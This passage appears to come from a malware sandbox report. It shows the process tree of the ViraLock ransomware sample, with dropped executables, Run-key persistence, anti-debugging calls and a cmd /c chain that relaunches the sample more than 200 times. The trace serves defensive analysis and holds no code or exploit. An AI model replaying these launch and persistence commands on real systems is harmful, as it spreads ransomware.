"C:\Users\Admin\BEsgsAUM\AwEkgEAU.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4232

C:\ProgramData\lYUUwkIo\SgUAQMAU.exe
"C:\ProgramData\lYUUwkIo\SgUAQMAU.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
4⤵
PID:3516

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
5⤵
- Executes dropped EXE
PID:2388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
6⤵
PID:644

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
7⤵
- Executes dropped EXE
PID:4612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
8⤵
PID:4264

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
9⤵
- Executes dropped EXE
PID:1792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
10⤵
PID:4664

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:116

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
11⤵
- Executes dropped EXE
PID:816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
12⤵
PID:2468

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
13⤵
- Executes dropped EXE
PID:644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
14⤵
PID:4780

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
15⤵
- Executes dropped EXE
PID:1644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
16⤵
PID:992

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
17⤵
- Executes dropped EXE
PID:1104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
18⤵
PID:2116

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
19⤵
- Executes dropped EXE
PID:5040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
20⤵
PID:3880

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
21⤵
- Executes dropped EXE
PID:888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
22⤵
PID:1964

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
23⤵
- Executes dropped EXE
PID:2488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
24⤵
PID:1596

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
25⤵
- Executes dropped EXE
PID:720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
26⤵
PID:1708

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
27⤵
- Executes dropped EXE
PID:2116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
28⤵
PID:1460

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
29⤵
- Executes dropped EXE
PID:3236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
30⤵
PID:3200

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
31⤵
- Executes dropped EXE
PID:1684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
32⤵
PID:4040

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
33⤵
- Executes dropped EXE
PID:716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
34⤵
PID:512

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
35⤵
- Executes dropped EXE
PID:1436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
36⤵
PID:3436

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
37⤵
- Executes dropped EXE
PID:268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
38⤵
PID:4704

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
39⤵
- Executes dropped EXE
PID:3748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
40⤵
PID:2116

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
41⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2360

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
41⤵
- Executes dropped EXE
PID:632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
42⤵
PID:512

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
43⤵
- Executes dropped EXE
PID:4860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
44⤵
PID:3056

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
45⤵
- Executes dropped EXE
PID:4916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
46⤵
PID:4704

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
47⤵
- Executes dropped EXE
PID:4472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
48⤵
PID:284

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
49⤵
- Executes dropped EXE
PID:2468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
50⤵
PID:208

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
51⤵
- Executes dropped EXE
PID:1684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
52⤵
PID:1232

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
53⤵
- Executes dropped EXE
PID:3548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
54⤵
PID:2488

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
55⤵
- Executes dropped EXE
PID:2232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
56⤵
PID:644

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
57⤵
- Executes dropped EXE
PID:4712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
58⤵
PID:4944

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
59⤵
- Executes dropped EXE
PID:4816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
60⤵
PID:300

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
61⤵
- Executes dropped EXE
PID:412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
62⤵
PID:1328

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
63⤵
- Executes dropped EXE
PID:4320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
64⤵
PID:3080

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
65⤵
- Executes dropped EXE
PID:3660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
66⤵
PID:432

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
67⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4932

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
67⤵
- Executes dropped EXE
PID:4972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
68⤵
PID:2564

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
69⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4976

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
69⤵
- Executes dropped EXE
PID:1828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
70⤵
PID:628

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
71⤵
- Executes dropped EXE
PID:2024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
72⤵
PID:3024

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
73⤵
- Executes dropped EXE
PID:4456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
74⤵
PID:284

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
75⤵
- Executes dropped EXE
PID:1640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
76⤵
PID:720

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
77⤵
- Executes dropped EXE
PID:3844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
78⤵
PID:3952

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
79⤵
- Executes dropped EXE
PID:2520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
80⤵
PID:1436

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
81⤵
- Executes dropped EXE
PID:4472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
82⤵
PID:2948

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
83⤵
- Executes dropped EXE
PID:1232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
84⤵
PID:2624

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
85⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
86⤵
PID:880

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
87⤵
PID:4612

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
87⤵
PID:2232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
88⤵
PID:4632

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
89⤵
PID:3236

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
89⤵
PID:3832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
90⤵
PID:280

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
91⤵
PID:5108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
92⤵
PID:296

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
93⤵
PID:3608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
94⤵
PID:4456

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
95⤵
PID:2596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
96⤵
PID:3080

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
97⤵
PID:716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
98⤵
PID:4288

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
99⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1328

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
99⤵
PID:212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
100⤵
PID:3704

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
101⤵
PID:2664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
102⤵
PID:4272

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
103⤵
PID:3640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
104⤵
PID:2596

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
105⤵
PID:2192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
106⤵
PID:2520

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
107⤵
PID:2016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
108⤵
PID:4896

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
109⤵
PID:400

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
109⤵
PID:3236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
110⤵
PID:4224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
111⤵
PID:3200

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
111⤵
PID:5040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
112⤵
PID:3472

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
113⤵
PID:1848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
114⤵
PID:4632

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
115⤵
PID:4056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
116⤵
PID:2536

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
117⤵
PID:3640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
118⤵
PID:4264

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
119⤵
PID:1148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
120⤵
PID:4896

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
121⤵
PID:116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
122⤵
PID:4916

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
123⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
124⤵
PID:3788

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
125⤵
PID:1848

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
125⤵
PID:1548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
126⤵
PID:4492

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
127⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
128⤵
PID:296

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
129⤵
PID:3204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
130⤵
PID:4564

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
131⤵
PID:4376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
132⤵
PID:1720

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
133⤵
PID:3748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
134⤵
PID:3464

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
135⤵
PID:4844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
136⤵
PID:644

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
137⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
138⤵
PID:4324

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
139⤵
PID:4144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
140⤵
PID:1680

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
141⤵
PID:4896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
142⤵
PID:2188

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
143⤵
PID:2900

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
143⤵
PID:2624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
144⤵
PID:3628

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
145⤵
PID:3464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
146⤵
PID:4804

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
147⤵
PID:1656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
148⤵
PID:4676

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
149⤵
PID:280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
150⤵
PID:3464

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
151⤵
PID:1004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
152⤵
PID:3404

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
153⤵
PID:644

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
153⤵
PID:4844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
154⤵
PID:2536

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
155⤵
PID:1680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
156⤵
PID:1952

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
157⤵
PID:5012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
158⤵
PID:4712

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
159⤵
PID:1720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
160⤵
PID:4092

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
161⤵
PID:4632

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
161⤵
PID:1252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
162⤵
PID:1704

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
163⤵
PID:2612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
164⤵
PID:1680

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
165⤵
PID:3988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
166⤵
PID:4340

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
167⤵
PID:3300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
168⤵
PID:784

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
169⤵
PID:4228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
170⤵
PID:4928

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
171⤵
PID:1656

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
171⤵
PID:4944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
172⤵
PID:4844

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
173⤵
PID:4996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
174⤵
PID:3016

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
175⤵
PID:3748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
176⤵
PID:1848

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
177⤵
PID:4728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
178⤵
PID:3420

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
179⤵
PID:4296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
180⤵
PID:4976

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
181⤵
PID:2972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
182⤵
PID:2184

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
183⤵
PID:2748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
184⤵
PID:4472

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
185⤵
PID:644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
186⤵
PID:3024

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
187⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
188⤵
PID:2596

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
189⤵
PID:4676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
190⤵
PID:1232

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
191⤵
PID:752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
192⤵
PID:4408

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
193⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
194⤵
PID:1848

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
195⤵
PID:1756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
196⤵
PID:888

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
197⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
198⤵
PID:3940

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
199⤵
PID:1680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
200⤵
PID:1252

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
201⤵
PID:5564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
202⤵
PID:6016

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
203⤵
PID:5360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
204⤵
PID:5308

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
205⤵
PID:5976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
206⤵
PID:4560

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
207⤵
PID:5544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
208⤵
PID:6124

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
209⤵
PID:4272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
210⤵
PID:4776

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
211⤵
PID:6140

